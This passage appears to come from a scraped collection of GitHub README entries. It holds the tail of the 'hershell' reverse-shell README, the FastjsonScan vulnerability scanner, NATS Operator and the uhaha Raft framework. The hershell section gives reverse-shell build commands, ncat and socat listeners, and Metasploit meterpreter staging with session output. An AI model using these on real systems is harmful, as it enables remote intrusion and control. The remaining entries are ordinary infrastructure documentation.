machines.\n\nThe following special commands are supported:\n\n* ``run_shell`` : drops you an system shell (allowing you, for example, to change directories)\n* ``inject `` : injects a 
shellcode (base64 encoded) in the same process memory, and executes it\n* ``meterpreter [tcp|http|https] IP:PORT`` : connects to a multi/handler to get a stage2 reverse tcp, http or https meterpreter from metasploit, and execute the shellcode in memory (Windows only at the moment)\n* ``exit`` : exit gracefully\n\n## Usage\n\nFirst of all, you will need to generate a valid certificate:\n```bash\n$ make depends\nopenssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem\nGenerating a 4096 bit RSA private key\n....................................................................................++\n.....++\nwriting new private key to 'server.key'\n-----\ncat server.key >> server.pem\n```\n\nFor windows:\n\n```bash\n# Predifined 32 bit target\n$ make windows32 LHOST=192.168.0.12 LPORT=1234\n# Predifined 64 bit target\n$ make windows64 LHOST=192.168.0.12 LPORT=1234\n```\n\nFor Linux:\n```bash\n# Predifined 32 bit target\n$ make linux32 LHOST=192.168.0.12 LPORT=1234\n# Predifined 64 bit target\n$ make linux64 LHOST=192.168.0.12 LPORT=1234\n```\n\nFor Mac OS X\n```bash\n$ make macos LHOST=192.168.0.12 LPORT=1234\n```\n\n## Examples\n\n### Basic usage\n\nOne can use various tools to handle incomming connections, such as:\n\n* socat\n* ncat\n* openssl server module\n* metasploit multi handler (with a `python/shell_reverse_tcp_ssl` payload)\n\nHere is an example with `ncat`:\n\n```bash\n$ ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234\nNcat: Version 7.60 ( https://nmap.org/ncat )\nNcat: Listening on :::1234\nNcat: Listening on 0.0.0.0:1234\nNcat: Connection from 172.16.122.105.\nNcat: Connection from 172.16.122.105:47814.\n[hershell]> whoami\ndesktop-3pvv31a\\lab\n```\n\nHere is an example with `socat` (tested with version `1.7.3.2`):\n```bash\n$ socat `tty` OPENSSL-LISTEN:1234,reuseaddr,cert=server.pem,key=server.key,verify=0\n# connection would be initiated here\n[hershell]> whoami\ndesktop-3pvv31a\\lab\n```\n\n### Meterpreter staging\n\n**WARNING**: this currently only work for the Windows platform.\n\nThe meterpreter staging currently supports the following payloads :\n\n* `windows/meterpreter/reverse_tcp`\n* `windows/x64/meterpreter/reverse_tcp`\n* `windows/meterpreter/reverse_http`\n* `windows/x64/meterpreter/reverse_http`\n* `windows/meterpreter/reverse_https`\n* `windows/x64/meterpreter/reverse_https`\n\nTo use the correct one, just specify the transport you want to use (tcp, http, https)\n\nTo use the meterpreter staging feature, just start your handler:\n\n```bash\n[14:12:45][172.16.122.105][Sessions: 0][Jobs: 0] > use exploit/multi/handler\n[14:12:57][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https\npayload => windows/x64/meterpreter/reverse_https\n[14:13:12][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lhost 172.16.122.105\nlhost => 172.16.122.105\n[14:13:15][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lport 8443\nlport => 8443\n[14:13:17][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set HandlerSSLCert ./server.pem\nHandlerSSLCert => ./server.pem\n[14:13:26][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > exploit -j\n[*] Exploit running as background job 0.\n\n[*] [2018.01.29-14:13:29] Started HTTPS reverse handler on https://172.16.122.105:8443\n[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >\n```\n\nThen, in `hershell`, use the 
`meterpreter` command:\n\n```bash\n[hershell]> meterpreter https 172.16.122.105:8443\n```\n\nA new meterpreter session should pop in `msfconsole`:\n\n```bash\n[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >\n[*] [2018.01.29-14:16:44] https://172.16.122.105:8443 handling request from 172.16.122.105; (UUID: pqzl9t5k) Staging x64 payload (206937 bytes) ...\n[*] Meterpreter session 1 opened (172.16.122.105:8443 -> 172.16.122.105:44804) at 2018-01-29 14:16:44 +0100\n\n[14:16:46][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions\n\nActive sessions\n===============\n\n Id Name Type Information Connection\n -- ---- ---- ----------- ----------\n 1 meterpreter x64/windows DESKTOP-3PVV31A\\lab @ DESKTOP-3PVV31A 172.16.122.105:8443 -> 172.16.122.105:44804 (10.0.2.15)\n\n[14:16:48][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions -i 1\n[*] Starting interaction with 1...\n\nmeterpreter > getuid\nServer username: DESKTOP-3PVV31A\\lab\n```\n\n## Credits\n\n[@khast3x](https://github.com/khast3x) for the Dockerfile feature\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "a1phaboy/FastjsonScan", "link": "https://github.com/a1phaboy/FastjsonScan", "tags": ["deserialization-vulnerability", "fastjson", "fastjson-rce", "scanner-web"], "stars": 554, "description": "Fastjson\u626b\u63cf\u5668\uff0c\u53ef\u8bc6\u522b\u7248\u672c\u3001\u4f9d\u8d56\u5e93\u3001autoType\u72b6\u6001\u7b49\u3002A tool to distinguish fastjson ,version and dependency", "lang": "Go", "repo_lang": "", "readme": "![FastjsonScan](https://socialify.git.ci/a1phaboy/FastjsonScan/image?font=Source%20Code%20Pro&forks=1&issues=1&language=1&name=1&owner=1&pattern=Circuit%20Board&stargazers=1&theme=Light)\n# FastjsonScan\nA tool to fast detect fastjson's deserialize vuln\n\n## 0x00 FastjsonScan now is public \ud83c\udf89\ud83c\udf89\ud83c\udf89\n\n\n### WHAT?\nFastjsonExpFramework is divided into multiple modules such as detection, utilization, confusion, and bypass JDK, and FastjsonScan is a part of it. It realizes multi-faceted positioning of fastjson versions by detecting errors, requests, and dependent libraries.\n\n### WHY?\nThe existing fastjson scanners cannot meet the fastjson version with such a fast iteration speed. Most of the scanners have long been unmaintained and are not suitable for higher versions. 
I will continue to optimize this series of projects.\n\n### HOW?\nCurrently fastjsonScan supports\n\u2611\ufe0fSupport batch interface detection\n\u2611\ufe0f Interval detection of 1.2.83 and below (mainly divided into three security versions 48, 68, and 80)\n\u2611\ufe0fSupport error reporting and echo detection\n\u2611\ufe0fDNS out network detection\n\u2611\ufe0fSupport AutoType status detection\n\u2611\ufe0f Dependency library detection\n\u2611\ufe0f Latency detection\n\n###TODO\nAdapt to the detection in the intranet environment\nAdapt webpack for automatic scanning\nImprove the detection of DNS echo detection dependent library\nImprove the detection method that is above version 61 and does not go online\nImprove the detection of other different json parsing libraries\nImprove related dependency library detection\n\n### If you have any questions during use, please submit issues\ud83d\udc4f\n\n### Demo\n![img.png](img.png)![img_1.png](img_1.png)\n\n## Usage\n**FastjsonScan [-u] url [-f] urls.txt [-o] result.txt**\n-u target url, note that http/https needs to be added\n-f target url file, can scan multiple urls\n-o result save file, the default results.txt file in the current folder\n\n## 0x01 Dev Notes\n\n### 2022-09-05 0.5\nFramework separates the scan module\n\n### 2022-09-05 0.4 beta\n\u2611\ufe0fRefactor the version detection module, and separate the judgment fastjson, jackson, org.json, gson as the recognition module\n\nTODO:\nUse dnslog to detect dependent libraries\nWrite using modules\n\n### 2022-09-04 0.35 beta\n\u2611\ufe0fFixed the detection payload of version 48. After detecting the payload of version 80, the payload will trigger tojavaobject to add the java.net.InetAddress class to the whitelist. When the second version detection is performed, false positives will occur\n\u2611\ufe0fVersion detection will give priority to judging whether AutoType is enabled, if it is enabled, it can only vaguely distinguish between 48 and above\n\n\n### 2022-09-03 0.34 beta\n\u2611\ufe0fRefactored version detection module, divided into 3 parts (48, 68, 80) from the previous precise detection\n\u2611\ufe0fRewrote the logic of judging version\n\u2611\ufe0fAdded the detection of version 80 and version 83\n\nTODO:\nDetection of target dependent library environment\nThe status of AutoType has an impact on version detection and needs to be dealt with\n\n\n### 2022-09-02 0.33 beta\n\u2611\ufe0fModified the error detection logic containing the jackson field\n\u2611\ufe0fDNS detection adds a 10-second waiting time to prevent false positives caused by network reasons\n\n### 2022-09-01 0.32 beta\n\u2611\ufe0f Add multiple gadgets, some gadgets are unsuccessful to reproduce, add according to the target environment\n\u2611\ufe0fModified the bug of delay detection\n\u2611\ufe0f Added URLReader detection chain\n\n### 2022-08-07 0.31 beta\n\u2611\ufe0f Added several gadgets\n\n### 2022-08-06 0.3 beta\n\u2611\ufe0f Completed the AutoType detection module\n\n### 2022-08-05 0.2 beta\n\u2611\ufe0fCompleted the main part of the detection module: including error detection, DNS detection and delay detection\n\n\n\n## 0x02 Reference\nhttps://github.com/safe6Sec/Fastjson\nhttps://github.com/hosch3n/FastjsonVulns\nhttps://github.com/iSafeBlue/fastjson-autotype-bypass-demo\n\n## 0x03 Acknowledgments\nMany thanks to [blue](https://github.com/iSafeBlue) for his wonderful sharing on kcon\nThanks a lot [hosch3n](https://github.com/hosch3n) Answers from Master Li", "readme_type": "markdown", "hn_comments": "", 
"gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nats-io/nats-operator", "link": "https://github.com/nats-io/nats-operator", "tags": ["nats", "kubernetes", "operator", "cluster", "message-queue", "pubsub"], "stars": 553, "description": "NATS Operator", "lang": "Go", "repo_lang": "", "readme": "# NATS Operator\n\n> :warning: The recommended way of running NATS on Kubernetes is by using the [Helm charts](https://github.com/nats-io/k8s/tree/master/helm/charts/nats). If looking for [JetStream](https://github.com/nats-io/jetstream) support, this is supported in the [Helm charts](https://github.com/nats-io/k8s/tree/master/helm/charts/nats#jetstream). The NATS Operator is not recommended to be used for new deployments.\n\n[![License Apache 2.0](https://img.shields.io/badge/License-Apache2-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0)\n[![Build Status](https://travis-ci.org/nats-io/nats-operator.svg?branch=master)](https://travis-ci.org/nats-io/nats-operator)\n[![Version](https://d25lcipzij17d.cloudfront.net/badge.svg?id=go&type=5&v=0.8.2)](https://github.com/nats-io/nats-operator/releases/tag/v0.8.2)\n\nNATS Operator manages NATS clusters atop [Kubernetes][k8s-home] using [CRDs](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/custom-resources/). If looking to run NATS on K8S without the operator you can also find [Helm charts in the nats-io/k8s repo](https://github.com/nats-io/k8s#helm-charts-for-nats). You can also find more info about running NATS on Kubernetes in the [docs](https://docs.nats.io/nats-on-kubernetes/nats-kubernetes) as well as a minimal setup using `StatefulSets` only without using the operator to get started [here](https://docs.nats.io/nats-on-kubernetes/minimal-setup).\n\n[k8s-home]: http://kubernetes.io\n\n## Requirements\n\n- Kubernetes v1.10+.\n - [Configuration reloading](#configuration-reload) is only supported in Kubernetes v1.12+.\n - [Authentication using service accounts](#auth-service-accounts) is only supported in Kubernetes v1.12+ having the `TokenRequest` API enabled.\n\n## Introduction\n\nNATS Operator provides a `NatsCluster` [Custom Resources Definition](https://kubernetes.io/docs/tasks/access-kubernetes-api/extend-api-custom-resource-definitions/) (CRD) that models a NATS cluster.\nThis CRD allows for specifying the desired size and version for a NATS cluster, as well as several other advanced options:\n\n```yaml\napiVersion: nats.io/v1alpha2\nkind: NatsCluster\nmetadata:\n name: example-nats-cluster\nspec:\n size: 3\n version: \"2.1.8\"\n```\n\nNATS Operator monitors creation/modification/deletion of `NatsCluster` resources and reacts by attempting to perform the any necessary operations on the associated NATS clusters in order to align their current status with the desired one.\n\n## Installing\n\nNATS Operator supports two different operation modes:\n\n* **Namespace-scoped (classic):** NATS Operator manages `NatsCluster` resources on the Kubernetes namespace where it is deployed.\n* **Cluster-scoped (experimental):** NATS Operator manages `NatsCluster` resources across all namespaces in the Kubernetes cluster.\n\nThe operation mode must be chosen when installing NATS Operator and cannot be changed later.\n\n### Namespace-scoped installation\n\nTo perform a namespace-scoped installation of NATS Operator in the Kubernetes cluster pointed at by the current context, you may run:\n\n```console\n$ kubectl apply -f https://github.com/nats-io/nats-operator/releases/latest/download/00-prereqs.yaml\n$ 
kubectl apply -f https://github.com/nats-io/nats-operator/releases/latest/download/10-deployment.yaml\n``` \n\nThis will, by default, install NATS Operator in the `default` namespace and observe `NatsCluster` resources created in the `default` namespace, alone.\nIn order to install in a different namespace, you must first create said namespace and edit the manifests above in order to specify its name wherever necessary.\n\n**WARNING:** To perform multiple namespace-scoped installations of NATS Operator, you must manually edit the `nats-operator-binding` cluster role binding in `deploy/00-prereqs.yaml` file in order to add all the required service accounts.\nFailing to do so may cause all NATS Operator instances to malfunction.\n\n**WARNING:** When performing a namespace-scoped installation of NATS Operator, you must make sure that all other namespace-scoped installations that may exist in the Kubernetes cluster share the same version.\nInstalling different versions of NATS Operator in the same Kubernetes cluster may cause unexpected behavior as the schema of the CRDs which NATS Operator registers may change between versions.\n\nAlternatively, you may use [Helm](https://www.helm.sh/) to perform a namespace-scoped installation of NATS Operator.\nTo do so you may go to [helm/nats-operator](https://github.com/nats-io/nats-operator/tree/master/helm/nats-operator) and use the Helm charts found in that repo.\n\n\n### Cluster-scoped installation (experimental)\n\nCluster-scoped installations of NATS Operator must live in the `nats-io` namespace.\nThis namespace must be created beforehand:\n\n```console\n$ kubectl create ns nats-io\n```\n\nThen, you must manually edit the manifests in `deployment/` in order to reference the `nats-io` namespace and to enable the `ClusterScoped` feature gate in the NATS Operator deployment.\n\n```yaml\napiVersion: apps/v1\nkind: Deployment\nmetadata:\n name: nats-operator\n namespace: nats-io\nspec:\n (...)\n spec:\n containers:\n - name: nats-operator\n (...)\n args:\n - nats-operator\n - --feature-gates=ClusterScoped=true\n (...)\n```\n\nOnce you have done this, you may install NATS Operator by running:\n\n```console\n$ kubectl apply -f https://github.com/nats-io/nats-operator/releases/latest/download/00-prereqs.yaml\n$ kubectl apply -f https://github.com/nats-io/nats-operator/releases/latest/download/10-deployment.yaml\n``` \n\n**WARNING:** When performing a cluster-scoped installation of NATS Operator, you must make sure that there are no other deployments of NATS Operator in the Kubernetes cluster.\nIf you have a previous installation of NATS Operator, you must uninstall it before performing a cluster-scoped installation of NATS Operator. \n\n## Creating a NATS cluster\n\nOnce NATS Operator has been installed, you will be able to confirm that two new CRDs have been registered in the cluster:\n\n```console\n$ kubectl get crd\nNAME CREATED AT\nnatsclusters.nats.io 2019-01-11T17:16:36Z\nnatsserviceroles.nats.io 2019-01-11T17:16:40Z\n```\n\nTo create a NATS cluster, you must create a `NatsCluster` resource representing the desired status of the cluster.\nFor example, to create a 3-node NATS cluster you may run:\n\n```console\n$ cat <\n#### Using ServiceAccounts\n\n> :warning: The ServiceAccounts uses a very rudimentary approach of config reloading and watching CRDs and advanced K8S APIs that may not be available in your cluster. 
Instead, the decentralized JWT approach should be preferred, to learn more: https://docs.nats.io/developing-with-nats/tutorials/jwt\n\nThe NATS Operator can define permissions based on Roles by using any present ServiceAccount in a namespace.\nThis feature requires a Kubernetes v1.12+ cluster having the `TokenRequest` API enabled.\nTo try this feature using `minikube` v0.30.0+, you can configure it to start as follows:\n\n```console\n$ minikube start \\\n --extra-config=apiserver.service-account-signing-key-file=/var/lib/minikube/certs/sa.key \\\n --extra-config=apiserver.service-account-key-file=/var/lib/minikube/certs/sa.pub \\\n --extra-config=apiserver.service-account-issuer=api \\\n --extra-config=apiserver.service-account-api-audiences=api,spire-server \\\n --extra-config=apiserver.authorization-mode=Node,RBAC \\\n --extra-config=kubelet.authentication-token-webhook=true\n```\n\nPlease note that availability of this feature across Kubernetes offerings may vary widely.\n\nServiceAccounts integration can then be enabled by setting the\n`enableServiceAccounts` flag to true in the `NatsCluster` configuration.\n\n```yaml\napiVersion: nats.io/v1alpha2\nkind: NatsCluster\nmetadata:\n name: example-nats\nspec:\n size: 3\n version: \"1.3.0\"\n\n pod:\n # NOTE: Only supported in Kubernetes v1.12+.\n enableConfigReload: true\n auth:\n # NOTE: Only supported in Kubernetes v1.12+ clusters having the \"TokenRequest\" API enabled.\n enableServiceAccounts: true\n```\n\nPermissions for a `ServiceAccount` can be set by creating a\n`NatsServiceRole` for that account. In the example below, there are\ntwo accounts, one is an admin user that has more permissions.\n\n```yaml\napiVersion: v1\nkind: ServiceAccount\nmetadata:\n name: nats-admin-user\n---\napiVersion: v1\nkind: ServiceAccount\nmetadata:\n name: nats-user\n---\napiVersion: nats.io/v1alpha2\nkind: NatsServiceRole\nmetadata:\n name: nats-user\n namespace: nats-io\n\n # Specifies which NATS cluster will be mapping this account.\n labels:\n nats_cluster: example-nats\nspec:\n permissions:\n publish: [\"foo.*\", \"foo.bar.quux\"]\n subscribe: [\"foo.bar\"]\n---\napiVersion: nats.io/v1alpha2\nkind: NatsServiceRole\nmetadata:\n name: nats-admin-user\n namespace: nats-io\n labels:\n nats_cluster: example-nats\nspec:\n permissions:\n publish: [\">\"]\n subscribe: [\">\"]\n```\n\nThe above will create two different Secrets which can then be mounted as volumes\nfor a Pod.\n\n```sh\n$ kubectl -n nats-io get secrets\nNAME TYPE DATA AGE\n...\nnats-admin-user-example-nats-bound-token Opaque 1 43m\nnats-user-example-nats-bound-token Opaque 1 43m\n```\n\nPlease note that `NatsServiceRole` must be created in the same namespace as \n`NatsCluster` is running, but `bound-token` will be created for `ServiceAccount` \nresources that can be placed in various namespaces.\n\nAn example of mounting the secret in a `Pod` can be found below:\n\n```yaml\napiVersion: v1\nkind: Pod\nmetadata:\n name: nats-user-pod\n labels:\n nats_cluster: example-nats\nspec:\n volumes:\n - name: \"token\"\n projected:\n sources:\n - secret:\n name: \"nats-user-example-nats-bound-token\"\n items:\n - key: token\n path: \"token\"\n restartPolicy: Never\n containers:\n - name: nats-ops\n command: [\"/bin/sh\"]\n image: \"wallyqs/nats-ops:latest\"\n tty: true\n stdin: true\n stdinOnce: true\n volumeMounts:\n - name: \"token\"\n mountPath: \"/var/run/secrets/nats.io\"\n```\n\nThen within the `Pod` the token can be used to authenticate against\nthe server using the created token.\n\n```sh\n$ 
kubectl -n nats-io attach -it nats-user-pod\n\n/go # nats-sub -s nats://nats-user:`cat /var/run/secrets/nats.io/token`@example-nats:4222 hello.world\nListening on [hello.world]\n^C\n/go # nats-sub -s nats://nats-admin-user:`cat /var/run/secrets/nats.io/token`@example-nats:4222 hello.world\nCan't connect: nats: authorization violation\n```\n\n#### Using a single secret with the explicit configuration.\n\nAuthorization can also be set for the server by using a secret\nwhere the permissions are defined in JSON:\n\n```json\n{\n \"users\": [\n { \"username\": \"user1\", \"password\": \"secret1\" },\n { \"username\": \"user2\", \"password\": \"secret2\",\n \"permissions\": {\n\t\"publish\": [\"hello.*\"],\n\t\"subscribe\": [\"hello.world\"]\n }\n }\n ],\n \"default_permissions\": {\n \"publish\": [\"SANDBOX.*\"],\n \"subscribe\": [\"PUBLIC.>\"]\n }\n}\n```\n\nExample of creating a secret to set the permissions:\n\n```sh\nkubectl create secret generic nats-clients-auth --from-file=clients-auth.json\n```\n\nNow when creating a NATS cluster it is possible to set the permissions as\nin the following example:\n\n```yaml\napiVersion: \"nats.io/v1alpha2\"\nkind: \"NatsCluster\"\npmetadata:\n name: \"example-nats-auth\"\nspec:\n size: 3\n version: \"1.1.0\"\n\n auth:\n # Definition in JSON of the users permissions\n clientsAuthSecret: \"nats-clients-auth\"\n\n # How long to wait for authentication\n clientsAuthTimeout: 5\n```\n\n\n### Configuration Reload\n\nOn Kubernetes v1.12+ clusters it is possible to enable on-the-fly reloading of configuration for the servers that are part of the cluster.\nThis can also be combined with the authorization support, so in case the user permissions change, then the servers will reload and apply the new permissions.\n\n```yaml\napiVersion: \"nats.io/v1alpha2\"\nkind: \"NatsCluster\"\nmetadata:\n name: \"example-nats-auth\"\nspec:\n size: 3\n version: \"1.1.0\"\n\n pod:\n # Enable on-the-fly NATS Server config reload\n # NOTE: Only supported in Kubernetes v1.12+.\n enableConfigReload: true\n\n # Possible to customize version of reloader image\n reloaderImage: connecteverything/nats-server-config-reloader\n reloaderImageTag: \"0.2.2-v1alpha2\"\n reloaderImagePullPolicy: \"IfNotPresent\"\n auth:\n # Definition in JSON of the users permissions\n clientsAuthSecret: \"nats-clients-auth\"\n\n # How long to wait for authentication\n clientsAuthTimeout: 5\n```\n\n## Connecting operated NATS clusters to external NATS clusters\n\nBy using the `extraRoutes` field on the spec you can make the operated\nNATS cluster create routes against clusters outside of Kubernetes:\n\n```yaml\napiVersion: \"nats.io/v1alpha2\"\nkind: \"NatsCluster\"\nmetadata:\n name: \"nats\"\nspec:\n size: 3\n version: \"1.4.1\"\n\n extraRoutes:\n - route: \"nats://nats-a.example.com:6222\"\n - route: \"nats://nats-b.example.com:6222\"\n - route: \"nats://nats-c.example.com:6222\"\n```\n\nIt is also possible to connect to another operated NATS cluster as follows:\n\n```yaml\napiVersion: \"nats.io/v1alpha2\"\nkind: \"NatsCluster\"\nmetadata:\n name: \"nats-v2-2\"\nspec:\n size: 3\n version: \"1.4.1\"\n\n extraRoutes:\n - cluster: \"nats-v2-1\"\n```\n\n## Resolvers\n\nThe operator only supports the `URL()` resolver, see [example/example-super-cluster.yaml](example/example-super-cluster.yaml#L56-L59)\n\n## Development\n\n### Building the Docker Image\n\nTo build the `nats-operator` Docker image:\n\n```sh\n$ docker build -f docker/operator/Dockerfile . 
-t \n```\n\nTo build the `nats-server-config-reloader`:\n\n```sh\n$ docker build -f docker/reloader/Dockerfile . -t \n```\n\nYou'll need Docker `17.06.0-ce` or higher.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tidwall/uhaha", "link": "https://github.com/tidwall/uhaha", "tags": ["raft", "high-availability", "framework", "fault-tolerant"], "stars": 553, "description": "High Availability Raft Framework for Go", "lang": "Go", "repo_lang": "", "readme": "

# uhaha
High Availability Framework for Happy Data

\n\nUhaha is a framework for building highly available Raft-based data applications in Go. \nThis is basically an upgrade to the [Finn](https://github.com/tidwall/finn) project, but has an updated API, better security features (TLS and auth passwords), \ncustomizable services, deterministic time, recalculable random numbers, simpler snapshots, a smaller network footprint, and more.\nUnder the hood it utilizes [hashicorp/raft](https://github.com/hashicorp/raft), [tidwall/redcon](https://github.com/tidwall/redcon), and [syndtr/goleveldb](https://github.com/syndtr/goleveldb).\n\n## Features\n\n- Simple API for quickly creating a custom Raft-based application.\n- Deterministic monotonic time that does not drift and stays in sync with the internet.\n- APIs for building custom services such as HTTP and gRPC.\n Supports the Redis protocol by default, so most Redis client library will work with Uhaha.\n- [TLS](#tls) and [Auth password](#auth-password) support.\n- Multiple examples to help jumpstart integration, including\n a [Key-value DB](https://github.com/tidwall/uhaha/tree/master/examples/kvdb), \n a [Timeseries DB](https://github.com/tidwall/uhaha/tree/master/examples/timeseries), \n and a [Ticket Service](https://github.com/tidwall/uhaha/tree/master/examples/ticket).\n\n## Example\n\nBelow a simple example of a service for monotonically increasing tickets. \n\n```go\npackage main\n\nimport \"github.com/tidwall/uhaha\"\n\ntype data struct {\n\tTicket int64\n}\n\nfunc main() {\n\t// Set up a uhaha configuration\n\tvar conf uhaha.Config\n\t\n\t// Give the application a name. All servers in the cluster should use the\n\t// same name.\n\tconf.Name = \"ticket\"\n\t\n\t// Set the initial data. This is state of the data when first server in the \n\t// cluster starts for the first time ever.\n\tconf.InitialData = new(data)\n\n\t// Since we are not holding onto much data we can used the built-in JSON\n\t// snapshot system. You just need to make sure all the important fields in\n\t// the data are exportable (capitalized) to JSON. In this case there is\n\t// only the one field \"Ticket\".\n\tconf.UseJSONSnapshots = true\n\t\n\t// Add a command that will change the value of a Ticket. \n\tconf.AddWriteCommand(\"ticket\", cmdTICKET)\n\n\t// Finally, hand off all processing to uhaha.\n\tuhaha.Main(conf)\n}\n\n// TICKET\n// help: returns a new ticket that has a value that is at least one greater\n// than the previous TICKET call.\nfunc cmdTICKET(m uhaha.Machine, args []string) (interface{}, error) {\n\t// The the current data from the machine\n\tdata := m.Data().(*data)\n\n\t// Increment the ticket\n\tdata.Ticket++\n\n\t// Return the new ticket to caller\n\treturn data.Ticket, nil\n}\n```\n\n### Building\n\nUsing the source file from the examples directory, we'll build an application\nnamed \"ticket\"\n\n```\ngo build -o ticket examples/ticket/main.go\n```\n\n### Running\n\nIt's ideal to have three, five, or seven nodes in your cluster.\n\nLet's create the first node.\n\n```\n./ticket -n 1 -a :11001\n```\n\nThis will create a node named 1 and bind the address to :11001\n\nNow let's create two more nodes and add them to the cluster.\n\n```\n./ticket -n 2 -a :11002 -j :11001\n./ticket -n 3 -a :11003 -j :11001\n```\n\nNow we have a fault-tolerant three node cluster up and running.\n\n### Using\n\nYou can use any Redis compatible client, such as the redis-cli, telnet, \nor netcat.\n\nI'll use the redis-cli in the example below.\n\nConnect to the leader. 
This will probably be the first node you created.\n\n```\nredis-cli -p 11001\n```\n\nSend the server a TICKET command and receive the first ticket.\n\n```\n> TICKET\n\"1\"\n```\n\nFrom here on, every TICKET command is guaranteed to generate a value larger\nthan the previous TICKET command.\n\n```\n> TICKET\n\"2\"\n> TICKET\n\"3\"\n> TICKET\n\"4\"\n> TICKET\n\"5\"\n```\n\n\n## Built-in Commands\n\nThere are a number of built-in commands for managing and monitoring the cluster.\n\n```sh\nVERSION # show the application version\nMACHINE # show information about the state machine\nRAFT LEADER # show the address of the current raft leader\nRAFT INFO [pattern] # show information about the raft server and cluster\nRAFT SERVER LIST # show all servers in cluster\nRAFT SERVER ADD id address # add a server to cluster\nRAFT SERVER REMOVE id # remove a server from the cluster\nRAFT SNAPSHOT NOW # make a snapshot of the data\nRAFT SNAPSHOT LIST # show a list of all snapshots on server\nRAFT SNAPSHOT FILE id # show the file path of a snapshot on server\nRAFT SNAPSHOT READ id [RANGE start end] # download all or part of a snapshot\n```\n\nThere are also some client commands.\n\n```sh\nQUIT # close the client connection\nPING # ping the server\nECHO [message] # echo a message to the server\nAUTH password # authenticate with a password\n```\n\n## Network and security considerations (TLS and Auth password)\n\nBy default a single Uhaha instance is bound to the local `127.0.0.1` IP address. Thus nothing outside that machine, including other servers in the cluster or machines on the same local network, will be able to communicate with this instance.\n\n### Network security\n\nTo open up the service you will need to provide an IP address that can be reached from the outside.\nFor example, let's say you want to set up three servers on a local `10.0.0.0` network.\n\nOn server 1:\n\n```sh\n./ticket -n 1 -a 10.0.0.1:11001\n```\n\nOn server 2:\n\n```sh\n./ticket -n 2 -a 10.0.0.2:11001 -j 10.0.0.1:11001\n```\n\nOn server 3:\n\n```sh\n./ticket -n 3 -a 10.0.0.3:11001 -j 10.0.0.1:11001\n```\n\nNow you have a Raft cluster running on three distinct servers in the same local network. This may be enough for applications that only require a [network security policy](https://en.wikipedia.org/wiki/Network_security). Basically any server on the local network can access the cluster.\n\n### Auth password\n\nIf you want to lock down the cluster further you can provide a secret auth, which is more or less a password that the cluster and client will need to communicate with each other.\n\n```sh\n./ticket -n 1 -a 10.0.0.1:11001 --auth my-secret\n```\n\nAll the servers will need to be started with the same auth.\n\n```sh\n./ticket -n 2 -a 10.0.0.2:11001 --auth my-secret -j 10.0.0.1:11001\n```\n\n```sh\n./ticket -n 3 -a 10.0.0.3:11001 --auth my-secret -j 10.0.0.1:11001\n```\n\nThe client will also need the same auth to talk with the cluster. 
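\n\nBecause Uhaha speaks the Redis protocol, a plain Go Redis client can call the custom `TICKET` command as well. The sketch below is illustrative only: it assumes the `github.com/go-redis/redis/v8` client and reuses the example address and `my-secret` auth from above; it is not part of Uhaha itself:\n\n```go\npackage main\n\nimport (\n\t\"context\"\n\t\"fmt\"\n\n\t\"github.com/go-redis/redis/v8\"\n)\n\nfunc main() {\n\tctx := context.Background()\n\n\t// Address and auth password taken from the example cluster above (assumptions).\n\trdb := redis.NewClient(&redis.Options{\n\t\tAddr:     \"10.0.0.1:11001\",\n\t\tPassword: \"my-secret\", // sent to the server as an AUTH command\n\t})\n\n\t// TICKET is the custom write command registered by the example application.\n\tval, err := rdb.Do(ctx, \"TICKET\").Result()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tfmt.Println(\"ticket:\", val)\n}\n```\n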
All redis clients support an auth password, such as:\n\n```sh\nredis-cli -h 10.0.0.1 -p 11001 -a my-secret\n```\n\nThis may be enough if you keep all your machines on the same private network, but you don't want all machines or applications to have unfettered access to the cluster.\n\n### TLS\n\nFinally you can use TLS, which I recommend along with an auth password.\n\nIn this example a custom cert and key are created using the [`mkcert`](https://github.com/FiloSottile/mkcert) tool.\n\n```sh\nmkcert uhaha-example\n# produces uhaha-example.pem, uhaha-example-key.pem, and a rootCA.pem\n```\n\nThen create a cluster using the cert & key files. Along with an auth.\n\n```sh\n./ticket -n 1 -a 10.0.0.1:11001 --tls-cert uhaha-example.pem --tls-key uhaha-example-key.pem --auth my-secret\n```\n\n```sh\n./ticket -n 2 -a 10.0.0.2:11001 --tls-cert uhaha-example.pem --tls-key uhaha-example-key.pem --auth my-secret -j 10.0.0.1:11001\n```\n\n```sh\n./ticket -n 2 -a 10.0.0.3:11001 --tls-cert uhaha-example.pem --tls-key uhaha-example-key.pem --auth my-secret -j 10.0.0.1:11001\n```\n\nNow you can connect to the server from a client that has the `rootCA.pem`. \nYou can find the location of your rootCA.pem file in the running `ls \"$(mkcert -CAROOT)/rootCA.pem\"`.\n\n```sh\nredis-cli -h 10.0.0.1 -p 11001 --tls --cacert rootCA.pem -a my-secret\n```\n\n## Command-line options\n\nBelow are all of the command line options.\n\n```\nUsage: my-uhaha-app [-n id] [-a addr] [options]\n\nBasic options:\n -v : display version\n -h : display help, this screen\n -a addr : bind to address (default: 127.0.0.1:11001)\n -n id : node ID (default: 1)\n -d dir : data directory (default: data)\n -j addr : leader address of a cluster to join\n -l level : log level (default: info) [debug,verb,info,warn,silent]\n\nSecurity options:\n --tls-cert path : path to TLS certificate\n --tls-key path : path to TLS private key\n --auth auth : cluster authorization, shared by all servers and clients\n\nNetworking 